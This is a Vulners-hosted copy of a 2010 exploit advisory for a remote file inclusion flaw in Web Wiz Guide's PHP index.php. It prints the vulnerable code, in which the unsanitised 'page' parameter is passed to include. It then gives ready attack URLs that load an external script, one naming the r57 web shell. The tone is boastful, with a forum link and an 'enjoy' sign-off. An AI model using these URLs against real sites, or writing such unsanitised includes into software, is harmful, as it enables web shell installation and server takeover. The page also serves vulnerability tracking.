Lucene search
K

Web Wiz Guide Remote File Inclusion

🗓️ 26 Jun 2010 00:00:00Reported by kannibal615Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Remote File Inclusion vulnerability in Web Wiz Guide 2007/2008 PHP version allows inclusion of external files via 'index.php' $page variabl

Code
`  
  
  
# Exploit Title: (Web Wiz Guide) Remote File Include Vulnerability  
# Date: 23-05-2010  
# Author: kannibal615  
# Software Link: N/A  
# Version: 2007/2008  
# Tested on: PHP  
# CVE : N/A  
# Code :   
  
  
@@ @@ @@@@@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@@ @@@@@  
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@  
@@ @@ @@ @@@ @@@@@@@ @@@@@@@@ @@ @@@@ @@@@@@ @@ @@  
@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@  
@@ @@@@@ @@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@@ @@ @@  
  
KANNIBAL615  
  
===[Exploit Name]========================================================  
  
(Web Wiz Guide) REMOTE FILE INCLUSION  
  
  
===[Found By]==========================================================  
  
== Found By : kannibal615  
== Website : www.vbhacker.net/vb  
== Email : zn[at]live[dot]de  
== From : TUNISIA > TUNISIE   
== Thanks to : ALL VBHACKER MEMBERS  
  
  
===[Exploit Info]========================================================  
  
== CMS : Web Wiz Guide - Web Wiz Rich cms  
== version : 2007/2008  
== risk : hight  
== dork : kannibal615 is the best ;)  
  
  
===[Bug File]===========================================================  
  
== Bug :  
(  
<?php  
  
$user = "index";  
$other = "admin";  
session_start();  
include_once "main.php";  
  
$page = isset($_GET['page'])?$_GET['page']:"main";  
  
// echo "*********** including: $page.$ext ************ <Br>";  
  
include "$page";  
  
  
  
  
?>   
)  
  
  
== Vulnerable file : index.php  
== Vulnerable variable : $page  
==   
== Demo :  
==   
== http://[localhost]/path/[index.php]?[$page]=[evil_script.txt???]  
== http://www.site.com/index.php?page=r57.txt???  
==   
==  
===[The End]=============================================================  
  
== enjoy :)  
==  
== kannibal615 Copyright 2010  
==  
== www.vbhacker.net/vb  
=======================================================================   
_________________________________________________________________  
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation